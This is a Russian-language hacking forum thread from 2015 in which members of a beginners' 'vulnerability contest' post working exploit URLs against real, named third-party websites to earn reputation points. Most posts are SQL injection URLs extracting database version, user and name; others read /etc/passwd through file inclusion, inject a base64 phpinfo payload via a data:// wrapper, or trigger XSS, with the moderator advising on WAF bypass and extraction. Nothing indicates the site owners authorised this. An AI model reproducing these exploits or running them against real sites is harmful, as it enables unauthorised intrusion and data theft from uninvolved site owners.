Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Конкурс уязвимостей для новичков (https://forum.antichat.xyz/showthread.php?t=426171)

faza02 01.06.2015 18:55

Правила:

Ваша задача найти уязвимости в веб-приложениях.

Каждая уязявимость оценивается в определенное количество баллов и после достижения отметки 20 вы получаете награду в виде репутации (достаточной, чтобы больше не писать в "Песочнице" ).

Также, действует система бонусов. Если вы приложите уязвимый код к найденной уязвимости, получаете еще 5 баллов. Обход WAF, нестандартность и уязвимости на крупных ресурсах будут также поощряться.

За плагиат баллы вычитаются, поэтому проверяйте найденные уязвимости в Google (не только на форуме Античат, но вообще по всему поисковику). Запрещено постить уязвимости на сайтах стран СНГ (ru, by, ua).

В посте необходимо указать тип уязвимости, требования и эксплоит (именно в таком формате), например:

Цитата:

Сообщение от None
Сайт: example.com
Уязвимость: SQL Injection
Эксплоит:
Код:

Code:
http://example.com/index.php?id=1 UNION SELECT 1,2,3,table_name FROM information_schema.tables

Код уязвимости:
Код:

Code:
$query = "SELECT news FROM cds WHERE id=".$_GET['id'];


Уязвимости:
  • SQL Injection (2 балла)
  • Stored XSS (2 балла)
  • Reflected XSS (1 балл)
  • Local File Inclusion (3 балла)
  • Remote File Inclusion (4 балла)
  • Remote Code Execution (5 баллов)
  • XXE (5 баллов)
  • Arbitary File Read (3 балла)

Для наглядности баллы будут в ручном режиме добавляться в таблицу: https://yarbabin.ru/antichat/

Типы уязвимостей:
  • Оранжевые (с приложенным исходным кодом уязвимости)
  • Серые (эксплоит без кода)

dmn75 04.06.2015 16:51

Буду первым. Если что не так подправьте

Site: dkcity.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://www.dkcity.com/products.php?uID=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12&cID=&keyword=&page=5

Site: knitty.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://www.knitty.com/banner.php?id=1641' and [t] and '1'='1&url=http://www.stringtheoryyarn.com/home.php?xid=1fd829ff61f9611a535fa8370f36caa7


faza02 04.06.2015 17:27

Цитата:

Сообщение от dmn75
dmn75 said:

Буду первым. Если что не так подправьте
Site: dkcity.com
Уязвимость: SQL Injection
Эксплоит:
Код:

Code:
http://www.dkcity.com/products.php?uID=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12&cID=&keyword=&page=5

Site: knitty.com
Уязвимость: SQL Injection
Эксплоит:
Код:

Code:
http://www.knitty.com/banner.php?id=1641' and [t] and '1'='1&url=http://www.stringtheoryyarn.com/home.php?xid=1fd829ff61f9611a535fa8370f36caa7


тулзой крутите? для blind тоже нужен запрос на вывод чего-нибудь. если сможете сделать вывод через еррор-басед, получите больше очков, как за крупный сайт. и, по возможности, пишите в один пост. в таблицу добавил.

P. S. активнее, ребят

BabaDook 04.06.2015 17:48

А я не понял, а где уязвимый код ? В этом-то вся сложность.(Для меня )

faza02 04.06.2015 17:50

Цитата:

Сообщение от BabaDook
BabaDook said:

А я не понял, а где уязвимый код ? В этом-то вся сложность.(Для меня )

Цитата:

Сообщение от yarbabin
yarbabin said:

Если вы приложите уязвимый код к найденной уязвимости, получаете еще 5 баллов

исходники с уязвимостью прибавляют баллы, но можно и без них

dmn75 04.06.2015 18:30

Да, тулзой кручу.

Сайт: theatreinchicago.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://www.theatreinchicago.com/news.php?articleID=999999.9 union all select 1,[t],3,4,5,6,7,8

Сайт: tsgconsumer.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://www.tsgconsumer.com/news/article/index.php?id=7999999.9' union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15 and '0'='0

Сайт: alicekwartler.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://alicekwartler.com/product-list.php?id=999999.9 union all select 1,[t]

Сайт: athenscine.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://athenscine.com/showing/details.php?id=999999.9 union all select 1,2,3,4,5,6,7,[t],9,10,11,12,13,14,15,16,17,18,19,20

Сайт: classifieds.chiangmaicitylife.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://classifieds.chiangmaicitylife.com/indepth/details.php?id=1261 or 1=[t] and 1=1

Сайт: cstv.collegesports.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://cstv.collegesports.com/ncaa_bkup/default.php?id=999999.9 union all select 1,2,[t],4,5

Сайт: ctnrecruiting.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://ctnrecruiting.com/event_details.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

Сайт: diarionecochea.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://diarionecochea.com/videos/view.php?id=999999.9' union all select 1,[t],3,4,5,6,7,8 and '0'='0&titulo=TN en vivo

Сайт: dogarchive.kennel-apbt.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://dogarchive.kennel-apbt.com/details.php?id=150874' and [t] and '1'='1

Сайт: eu.bosscom.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://eu.bosscom.com/product.asp?id=[t]

Какой именно запрос на вывод нужен?

faza02 04.06.2015 18:34

Цитата:

Сообщение от dmn75
dmn75 said:

Какой именно запрос на вывод нужен?

если blind, то хотя бы substring версии

BigBear 04.06.2015 18:36

Цитата:

Сообщение от yarbabin
yarbabin said:

если blind, то хотя бы substring версии

substring не интересен. Давайте left(), right(), или mid() хотя бы. Что уж совсем простое.

faza02 04.06.2015 18:52

Цитата:

Сообщение от BigBear
BigBear said:

substring не интересен. Давайте left(), right(), или mid() хотя бы. Что уж совсем простое.

а разница?

BigBear 04.06.2015 18:56

Цитата:

Сообщение от yarbabin
yarbabin said:

а разница?

Для развеивания шаблонного мышления.

faza02 05.06.2015 12:18

Цитата:

Сообщение от dmn75
dmn75 said:

Да, тулзой кручу.
Сайт: theatreinchicago.com
Уязвимость: SQL Injection
Эксплоит:
Код:

Code:
http://www.theatreinchicago.com/news.php?articleID=999999.9 union all select 1,[t],3,4,5,6,7,8

Сайт: tsgconsumer.com
Уязвимость: SQL Injection
Эксплоит:
Код:

Code:
http://www.tsgconsumer.com/news/article/index.php?id=7999999.9' union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15 and '0'='0

Сайт: alicekwartler.com
Уязвимость: SQL Injection
Эксплоит:
Код:

Code:
http://alicekwartler.com/product-list.php?id=999999.9 union all select 1,[t]

Сайт: athenscine.com
Уязвимость: SQL Injection
Эксплоит:
Код:

Code:
http://athenscine.com/showing/details.php?id=999999.9 union all select 1,2,3,4,5,6,7,[t],9,10,11,12,13,14,15,16,17,18,19,20

Сайт: classifieds.chiangmaicitylife.com
Уязвимость: SQL Injection
Эксплоит:
Код:

Code:
http://classifieds.chiangmaicitylife.com/indepth/details.php?id=1261 or 1=[t] and 1=1

Сайт: cstv.collegesports.com
Уязвимость: SQL Injection
Эксплоит:
Код:

Code:
http://cstv.collegesports.com/ncaa_bkup/default.php?id=999999.9 union all select 1,2,[t],4,5

Сайт: ctnrecruiting.com
Уязвимость: SQL Injection
Эксплоит:
Код:

Code:
http://ctnrecruiting.com/event_details.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

Сайт: diarionecochea.com
Уязвимость: SQL Injection
Эксплоит:
Код:

Code:
http://diarionecochea.com/videos/view.php?id=999999.9' union all select 1,[t],3,4,5,6,7,8 and '0'='0&titulo=TN en vivo

Сайт: dogarchive.kennel-apbt.com
Уязвимость: SQL Injection
Эксплоит:
Код:

Code:
http://dogarchive.kennel-apbt.com/details.php?id=150874' and [t] and '1'='1

Сайт: eu.bosscom.com
Уязвимость: SQL Injection
Эксплоит:
Код:

Code:
http://eu.bosscom.com/product.asp?id=[t]

Какой именно запрос на вывод нужен?

я засчитал все те, что с выводом, не болкируются wafом и не присутствуют уже где-либо, остальные либо докручивайте, либо ищите с выводом, если не получается.

Печа 07.06.2015 19:18

Мои первые в жизни уязвимости, раньше ни когда этим не занимался, начал интересоваться этой тематикой, совсем недавно, после того как зарегистрировался на этом форуме, поэтому не судите строго если что не так написал.

Сайт: isotropix.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://www.isotropix.com/index.php?to=news&view=viewid&id=999999.9%20union%20all%20select%201,2,3,4,5,6,999,8,9,10,11,12,13,14,15,16,17,18

Сайт: judgement-yard.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://www.judgement-yard.com/index.php?pageID=999999.9%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,999,12,13,14,15&detail=log&id=75

Сайт: newchristian.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://newchristian.com/view.php?id=999999.9%20union%20all%20select%201,2,999

Сайт: patagonianshells.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://patagonianshells.com/index.php?link=home&seccion=999999.9%20union%20all%20select%201,2,3,4,999,6--

Сайт: rhodesnow.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://www.rhodesnow.com/rhodes-guide/pages.php?id=999999.9%22%20union%20all%20select%20,1,2%20and%20%220%22=%220&lang=english

Сайт: seavernon.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://www.seavernon.com/index.php?id=22&lg=fr%20or%201=999%20and%201=1

Сайт: watch-clock.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://www.watch-clock.com/01-07/03/01/0a/a-01.php?ProductID=999


Rypjaer 07.06.2015 19:24

Сайт: www.justintime.in

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.justintime.in/brand.php?catid=-7%27+union+select+1,2,3,4,concat_ws%28version%28%29,user%28%29,database%28%29%29,6+--+

Сайт: www.hergolfgame.com

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.hergolfgame.com/shopcat.php?catID=-6%27+union+select+1,concat_ws%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,3,4,5,6,7,8,9,10+--+

Сайт: www.secretslk.com

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.secretslk.com/productList.php?catid=-17%27/*!12345union*/+select+1,version%28%29,3+--+r

Сайт: dianaboutiquebd.com

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://dianaboutiquebd.com/saree_cat.php?catid=-14+union+select+1,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29+--+

Сайт: www.localfirstaz.com

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.localfirstaz.com/directory/category.php?catid=-508+union+select+1,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29+--+


faza02 07.06.2015 20:44

Цитата:

Сообщение от Rypjaer
Rypjaer said:

Сайт:
www.justintime.in
Уязвимость: SQLi
Эксплоит:
Код:

Code:
http://www.justintime.in/brand.php?catid=-7%27+union+select+1,2,3,4,concat_ws%28version%28%29,user%28%29,database%28%29%29,6+--+

Сайт:
www.hergolfgame.com
Уязвимость: SQLi
Эксплоит:
Код:

Code:
http://www.hergolfgame.com/shopcat.php?catID=-6%27+union+select+1,concat_ws%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,3,4,5,6,7,8,9,10+--+

Сайт:
www.secretslk.com
Уязвимость: SQLi
Эксплоит:
Код:

Code:
http://www.secretslk.com/productList.php?catid=-17%27/*!12345union*/+select+1,version%28%29,3+--+r

Сайт: dianaboutiquebd.com
Уязвимость: SQLi
Эксплоит:
Код:

Code:
http://dianaboutiquebd.com/saree_cat.php?catid=-14+union+select+1,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29+--+

Сайт:
www.localfirstaz.com
Уязвимость: SQLi
Эксплоит:
Код:

Code:
http://www.localfirstaz.com/directory/category.php?catid=-508+union+select+1,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29+--+


добавил в таблицу.

Цитата:

Сообщение от Печа
Печа said:

Мои первые в жизни уязвимости, раньше ни когда этим не занимался, начал интересоваться этой тематикой, совсем недавно, после того как зарегистрировался на этом форуме, поэтому не судите строго если что не так написал.
Сайт: isotropix.com
Уязвимость: SQL Injection
Эксплоит:
Код:

Code:
http://www.isotropix.com/index.php?to=news&view=viewid&id=999999.9 union all select 1,2,3,4,5,6,[t],8,9,10,11,12,13,14,15,16,17,18

Сайт: judgement-yard.com
Уязвимость: SQL Injection
Эксплоит:
Код:

Code:
http://www.judgement-yard.com/index.php?pageID=999999.9 union all select 1,2,3,4,5,6,7,8,9,10,[t],12,13,14,15&detail=log&id=75

Сайт: newchristian.com
Уязвимость: SQL Injection
Эксплоит:
Код:

Code:
http://newchristian.com/view.php?id=999999.9 union all select 1,2,[t]

Сайт: patagonianshells.com
Уязвимость: SQL Injection
Эксплоит:
Код:

Code:
http://patagonianshells.com/index.php?link=home&seccion=999999.9 union all select 1,2,3,4,[t],6--

Сайт: rhodesnow.com
Уязвимость: SQL Injection
Эксплоит:
Код:

Code:
http://www.rhodesnow.com/rhodes-guide/pages.php?id=999999.9" union all select [t],2 and "0"="0&lang=english

Сайт: seavernon.com
Уязвимость: SQL Injection
Эксплоит:
Код:

Code:
http://www.seavernon.com/index.php?id=22&lg=fr or 1=[t] and 1=1

Сайт: watch-clock.com
Уязвимость: SQL Injection
Эксплоит:
Код:

Code:
http://www.watch-clock.com/01-07/03/01/0a/a-01.php?ProductID=[t]


на blind нужен вывод, для остальных уберите это [t], которое добавляет софт, чтобы был нормальный вывод

3nvY 11.06.2015 21:57

Сайт: hexonline.co.uk

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.hexonline.co.uk/Product.php?cid=-6+union+select+1,group_concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,3,4,5,6,7,8+--+-

Сайт: fleurlis.com.tw

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.fleurlis.com.tw/en/scene.php?cid=1&id=-2+union+select+1,2,group_concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,4,555,6,7,8,9+--+-

Сайт: pnelsoncomposer.com

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.pnelsoncomposer.com/guides/stmarks/ShowCat.php?catid=-82+union+select+1,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,3+--+-

Сайт: puccimanuli.com

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.puccimanuli.com/pages/products.php?cat=-7+union+select+1,concat%28database%28%29,user%28%29,version%28%29%29,3,4,5,6,7,8+--+

Сайт: boutique.rrconcept.com

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://boutique.rrconcept.com/achat/index.php?catid=21%22+OR+1+GROUP+BY+CONCAT_WS%280x3a,USER%28%29,DATABASE%28%29,VERSION%28%29,FLOOR%28RAND%280%29*2%29%29+HAVING+MIN%280%29+OR+1+--+


semen6192 14.06.2015 22:16

Сайт: www.cobranet.org/about.php?id=1

Уязвимость: SQLi

Эксплоит:

http://www.cobranet.org/about.php?id=9999999 union select 1,2,3,version(),5,6 --

Сайт: http://www.raahauges.com/view-news.php?id=8

Уязвимость: SQLi

Эксплоит: http://www.raahauges.com/view-news.php?id=null union select 1,2,@@Version,4,5 --

Печа 15.06.2015 03:19

Сайт: http://www.yd1688.com

Уязвимость: SQL Injection

Эксплоит:

Код:

Code:
http://www.yd1688.com/en/about.php?id=999999.9%20union%20all%20select%201,2,999,4,5,6,7,8,9,10,11,12,13,14


faza02 15.06.2015 03:25

Цитата:

Сообщение от Печа
Печа said:

Сайт:
http://www.yd1688.com
Уязвимость: SQL Injection
Эксплоит:
Код:

Code:
http://www.yd1688.com/en/about.php?id=999999.9%20union%20all%20select%201,2,999,4,5,6,7,8,9,10,11,12,13,14


предыдущие поправьте на нормальный вывод.

Цитата:

Сообщение от 3nvY
3nvY said:

Сайт: hexonline.co.uk
Уязвимость: SQLi
Эксплоит:
Код:

Code:
http://www.hexonline.co.uk/Product.php?cid=-6+union+select+1,group_concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,3,4,5,6,7,8+--+-

Сайт: fleurlis.com.tw
Уязвимость: SQLi
Эксплоит:
Код:

Code:
http://www.fleurlis.com.tw/en/scene.php?cid=1&id=-2+union+select+1,2,group_concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,4,555,6,7,8,9+--+-

Сайт: pnelsoncomposer.com
Уязвимость: SQLi
Эксплоит:
Код:

Code:
http://www.pnelsoncomposer.com/guides/stmarks/ShowCat.php?catid=-82+union+select+1,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,3+--+-

Сайт: puccimanuli.com
Уязвимость: SQLi
Эксплоит:
Код:

Code:
http://www.puccimanuli.com/pages/products.php?cat=-7+union+select+1,concat%28database%28%29,user%28%29,version%28%29%29,3,4,5,6,7,8+--+

Сайт: boutique.rrconcept.com
Уязвимость: SQLi
Эксплоит:
Код:

Code:
http://boutique.rrconcept.com/achat/index.php?catid=21%22+OR+1+GROUP+BY+CONCAT_WS%280x3a,USER%28%29,DATABASE%28%29,VERSION%28%29,FLOOR%28RAND%280%29*2%29%29+HAVING+MIN%280%29+OR+1+--+


все, 20 баллов набрано, поздравляю!

Neon2211 15.06.2015 04:27

Cайт:http://www.cygnethome.com/

Уязвимость:SQLi

Эксплойт:

Код:

Code:
http://www.cygnethome.com/showsub.php?id=999999.9%20union%20all%20select%201,2,999,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67--

Сайт:http://www.blcontrol.com/

Уязвимость:SQLi

Эксплойт:

Код:

Code:
http://www.blcontrol.com/products.php?MSecID=999999.9%27%20union%20all%20select%201,2,999,4,5,6,7,8%20and%20%270%27=%270&SecID=113&MainID=0&SubID=0

Сайт:http://gobpo.com/

Уязвимость:SQLi

Эксплойт:

Код:

Code:
http://gobpo.com/index.php?pageid=999999.9%20union%20all%20select%20999,2--

Cайт:http://store.schulmerichbells.com/

Уязвимость:SQLi

Эксплойт:

Код:

Code:
http://store.schulmerichbells.com/category.php?cat_id=999999.9%20union%20all%20select%20999,2,3

Cайт:http://www.immobilien-niederzier.com/

Уязвимость:SQLi

Эксплойт:

Код:

Code:
http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%201,2,3,999

Сайт:http://www.focus-lighting.com/

Уязвимость:

Эксплойт:

Код:

Code:
http://www.focus-lighting.com/showproduct.php?productId=4&productVariantId=999999.9%20union%20all%20select%201,2,3,4,5,6,7,999,9


faza02 15.06.2015 13:24

Цитата:

Сообщение от Neon2211
Neon2211 said:

Cайт:
http://www.cygnethome.com/
Уязвимость:SQLi
Эксплойт:
Код:

Code:
http://www.cygnethome.com/showsub.php?id=999999.9%20union%20all%20select%201,2,999,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67--

Сайт:
http://www.blcontrol.com/
Уязвимость:SQLi
Эксплойт:
Код:

Code:
http://www.blcontrol.com/products.php?MSecID=999999.9%27%20union%20all%20select%201,2,999,4,5,6,7,8%20and%20%270%27=%270&SecID=113&MainID=0&SubID=0

Сайт:
http://gobpo.com/
Уязвимость:SQLi
Эксплойт:
Код:

Code:
http://gobpo.com/index.php?pageid=999999.9%20union%20all%20select%20999,2--

Cайт:
http://store.schulmerichbells.com/
Уязвимость:SQLi
Эксплойт:
Код:

Code:
http://store.schulmerichbells.com/category.php?cat_id=999999.9%20union%20all%20select%20999,2,3

Cайт:
http://www.immobilien-niederzier.com/
Уязвимость:SQLi
Эксплойт:
Код:

Code:
http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%201,2,3,999

Сайт:
http://www.focus-lighting.com/
Уязвимость:
Эксплойт:
Код:

Code:
http://www.focus-lighting.com/showproduct.php?productId=4&productVariantId=999999.9%20union%20all%20select%201,2,3,4,5,6,7,999,9


очень много повторов, два из них отсюда: http://pastebin.com/tRpAyh1t

BabaDook 15.06.2015 13:36

PHP код:

PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%201,2,3,version()[/COLOR][/COLOR] 

Автор, скажите пожалуйста версию, и где вывод

Neon2211 15.06.2015 13:54

Цитата:

Сообщение от yarbabin
yarbabin said:

очень много повторов, два из них отсюда:
http://pastebin.com/tRpAyh1t

Кстати не одну из уезвимостей не брал на этом сайте http://pastebin.com/

Искал через софт !

kingbeef 15.06.2015 14:11

Цитата:

Сообщение от BabaDook
BabaDook said:

PHP код:

PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%201,2,3,version()[/COLOR][/COLOR] 

Автор, скажите пожалуйста версию, и где вывод

Вывод в исходном коде.

Код:

Code:
http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%20111111111111111,22222222222,333333333333,44444444444

Нажимаем ctrl+f и ищем 4444444

Нашли на 473 строке

Код:

Code:
http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%20111111111111111,22222222222,333333333333,version()

выдает нам на 473 строке

Код:

Code:
var image2 = new Image();image2.src = 'http://www.immospaze.de/images/5.1.73-community';


BabaDook 15.06.2015 15:02

Цитата:

Сообщение от kingbeef
kingbeef said:

Вывод в исходном коде.
Код:

Code:
http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%20111111111111111,22222222222,333333333333,44444444444

Нажимаем ctrl+f и ищем 4444444
Нашли на 473 строке
Код:

Code:
http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%20111111111111111,22222222222,333333333333,version()

выдает нам на 473 строке
Код:

Code:
var image2 = new Image();image2.src = 'http://www.immospaze.de/images/5.1.73-community';


Вы же не автор. вывод подключаемой картинке срц=вывод . Мне просто иногда кажется что...

Neon2211 15.06.2015 17:03

Сайт:http://www.cqtailian.com/

Уязвимость:SQLi

Эксплойт:

Код:

Code:
http://www.cqtailian.com/Content.php?categoryid=999999.9%20union%20all%20select%20999,2,3,4,5


faza02 15.06.2015 17:17

Цитата:

Сообщение от Neon2211
Neon2211 said:

Сайт:
http://www.cqtailian.com/
Уязвимость:SQLi
Эксплойт:
Код:

Code:
http://www.cqtailian.com/Content.php?categoryid=999999.9%20union%20all%20select%20999,2,3,4,5


а вот тут вывода нет.

semen6192 16.06.2015 19:40

Сайт: http://jithubhq.microbold.net/tutori...ials.php?id=11

Уязвимость: SQLi

Эксплойт: http://jithubhq.microbold.net/tutori...als.php?id=-11 UNION SELECT @@Version,2,3,4 --

artificer 17.06.2015 21:58

Сайт:http:www.brzozo.com

Уязвимость:Local File Reading

Эксплойт:

Код:

Code:
http://www.brzozo.com/force-download.php?file=/etc/passwd
http://www.brzozo.com/force-download.php?file=db.php
http://www.brzozo.com/popup.php
http://www.brzozo.com/popup.php?id=1

Так принимается?

faza02 17.06.2015 22:26

Цитата:

Сообщение от artificer
artificer said:

Сайт:
http:
www.brzozo.com
Уязвимость:Local File Reading
Эксплойт:
Код:

Code:
http://www.brzozo.com/force-download.php?file=/etc/passwd
http://www.brzozo.com/force-download.php?file=db.php
http://www.brzozo.com/popup.php
http://www.brzozo.com/popup.php?id=1

Так принимается?

принимается, однако в гугле уже эта уязвимость есть, а касаемо повторов есть правило

Neon2211 18.06.2015 00:27

Сайт:www.stateofemergencyltd.com

Уязвимость:SQLi

Эксплойт:

Код:

Code:
http://www.stateofemergencyltd.com/news.php?id=999999.9 union all select 1,[t],3,4,5,6,7

Сайт:www.upani.com

Уязвимость:SQLi

Эксплойт:

Код:

Code:
http://www.upani.com/productinfo.php?pid=85' and [t] and '1'='1&cid=5&psid=rajpur-collection-invitation-box

Cайт:www.corpsport.com

Уязвимость:SQLi

Эксплойт:

Код:

Code:
http://www.corpsport.com/productDetails.php?id=999999.9 union all select 1,[t],3,4,5

Cайт:www.immobilien-niederzier.com

Уязвимость:SQLi

Эксплойт:

Код:

Code:
http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%201,2,3,[t]


semen6192 18.06.2015 12:49

Сайт: http://www.karnaticlabrecords.com/artists.php?id=32

Уязвимость: SQLi

Эксплойт:

http://www.karnaticlabrecords.com/a...CAT(MID(VERSION(), 1, 63), FLOOR(RAND(0)*2)))

faza02 22.06.2015 14:04

всем добавил. sqli из паблика не зачтены.

faza02 22.06.2015 23:06

для тех, кто уже прошел (на данный момент это только @3nvY). предлагаю повысить свой скилл, найдя все уязвимости из списка. это шанс проявить себя и разобраться с основным типом уязвимостей.

3nvY 24.06.2015 22:41

Сайт: hfboapps.ucr.edu

Уязвимость: LFI

Эксплойт:

Код:

Code:
http://fboapps.ucr.edu/policies/index.php?path=/etc/passwd

Сайт: www.gamsc.com

Уязвимость: LFI

Эксплойт:

Код:

Code:
http://www.gamsc.com/index.php?filename=../../../../../../../etc/passwd

Сайт: www.mycklaflon.se

Уязвимость: RFI

Эксплойт:

Код:

Code:
www.mycklaflon.se/index1.asp?page=http://www.vk.com


faza02 25.06.2015 00:33

Цитата:

Сообщение от 3nvY
3nvY said:

Сайт:
www.mycklaflon.se
Уязвимость: RFI
Эксплойт:
Код:

Code:
www.mycklaflon.se/index1.asp?page=http://www.vk.com


не RFI, но IFRAME Injection

semen6192 25.06.2015 22:53

1)Сайт: http://www.felixfilm.se/film.php?id=77

Уязвимость: SQLi

Эксплойт: http://www.felixfilm.se/film.php?id=...,6,7,8,9,10 --

2)Сайт: http://prontowash.com/usa/location.php?id=2

Уязвимость: SQLi

Эксплойт: http://prontowash.com/usa/location.php?id=-2 UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15--

3)Сайт: http://www.comtecwash.com/photos.php?id=1

Уязвимость: SQLi

Эксплойт: http://www.comtecwash.com/photos.php?id=-1 UNION SELECT 1,2,3,4,version(),6,7,8,9,10--

4)Сайт: http://odessa-life.od.ua

Уязвимость: XSS

Эксплойт: http://odessa-life.od.ua/gue/search

P.S В поиске: alert('1')

5)Сайт: http://mapexpert.com.ua/index_ru.php?id=67&table=news

Уязвимость: SQLi

Эксплойт: http://mapexpert.com.ua/index_ru.php...--+&table=news

P.S Там еще и XSS уязвимость есть: вместо 3,5 или 7 подставляем alert('antichat.ru')

6)Сайт: http://prokudin-gorskiy.ru

Уязвимость: XSS

Эксплойт: http://prokudin-gorskiy.ru/search.php?send=on&scope=1&key=alert('antichat.ru' )

3nvY 28.06.2015 19:58

Сайт: www.walkandtrain.com

Уязвимость: RFI

Эксплоит:

Код:

Code:
http://www.walkandtrain.com/index.php?x=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D

Сайт: railusers.net

Уязвимость: RFI

Эксплоит:

Код:

Code:
http://railusers.net/index.php?link=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D

Подскажите пожалуйста где почитать инфу по Local File Reading(LFR). На ачате и в гугле чёт не могу найти.

faza02 28.06.2015 22:44

Цитата:

Сообщение от 3nvY
3nvY said:

Сайт:
www.walkandtrain.com
Уязвимость: RFI
Эксплоит:
Код:

Code:
http://www.walkandtrain.com/index.php?x=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D

Сайт: railusers.net
Уязвимость: RFI
Эксплоит:
Код:

Code:
http://railusers.net/index.php?link=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D

Подскажите пожалуйста где почитать инфу по Local File Reading(LFR). На ачате и в гугле чёт не могу найти.

да тут ничего особенного. просто чтение локальных файлов. в php это readfile, file_get_contents и т. д. никаких особых фишек там нет, разве что некоторые функции поддерживают нуль-байт

3nvY 28.06.2015 22:57

Цитата:

Сообщение от 3nvY
3nvY said:

Сайт:
www.walkandtrain.com
Уязвимость: RFI
Эксплоит:
Код:

Code:
http://www.walkandtrain.com/index.php?x=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D

Сайт: railusers.net
Уязвимость: RFI
Эксплоит:
Код:

Code:
http://railusers.net/index.php?link=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D


То есть это не RFI, или это ответ на мой вопрос. Сори за оффтоп я немного туго мыслящий

faza02 28.06.2015 23:21

Цитата:

Сообщение от 3nvY
3nvY said:

То есть это не RFI, или это ответ на мой вопрос. Сори за оффтоп я немного туго мыслящий

ответ на вопрос. но да, это RFI


Время: 19:11